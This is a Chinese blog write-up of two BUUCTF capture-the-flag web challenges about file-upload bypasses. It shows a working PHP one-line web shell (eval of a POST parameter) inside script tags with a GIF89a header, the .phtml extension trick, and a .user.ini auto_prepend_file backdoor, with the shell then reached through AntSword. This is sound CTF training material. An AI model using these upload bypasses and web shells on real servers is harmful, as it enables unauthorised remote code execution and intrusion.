BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn

一、[极客大挑战 2019]Upload

Ⅰ、.phtml

.phtml是PHP2程序的标准文件扩展名,当PHP4更新后,统一为.php

Ⅱ、解题

开启环境
在这里插入图片描述
尝试上传一句话木马,发现网站会检查文件类型
在这里插入图片描述
使用Burp抓包,将上传的一句话木马修改后缀,并修改文件类型为image/jpeg

在这里插入图片描述
报错,提示禁止上传内容包含<?的文件,因此不能使用.php

在这里插入图片描述
这里使用旧版本PHP的文件,即.phtml,将一句话木马包进去,另外加上GIF的文件头绕过图片判断

GIF89a
<script language="PHP">@eval($_POST["a"]);</script>

在这里插入图片描述
成功上传

在这里插入图片描述
尝试多次,猜测上传路径为/upload/xxx.phtml,使用蚁剑连接

在这里插入图片描述
根目录找到flag目录,打开即可得到FLAG

在这里插入图片描述
在这里插入图片描述

二、[SUCTF 2019]CheckIn

Ⅰ、exif_imagetype()绕过

给文件首行添加图片文件头即可绕过,常见的是添加GIF文件头GIF89a

Ⅱ、.user.ini

此文件控制着用户设置
若服务器为PHP、且上传的目录内含有php文件可以使用,通过添加语句auto_prepend_file=xxx,指定预解析文件,则可以在加载主页前预解析一句话木马,即可开启后门

Ⅲ、解题

上传一句话木马和设置文件,需要添加GIF文件头绕过检测

其中,一句话木马后缀为jpg

#a.phtml.jpg
GIF89a
<script language="PHP">@eval($_POST["a"]);</script>
#.user.ini
GIF89a
auto_prepend_file=a.phtml.jpg

使用蚁剑连接访问index.php即可得到根目录进而拿到FLAG

在这里插入图片描述
在这里插入图片描述

欢迎在评论区留言
感谢浏览

猜你喜欢

转载自blog.csdn.net/Xxy605/article/details/108962735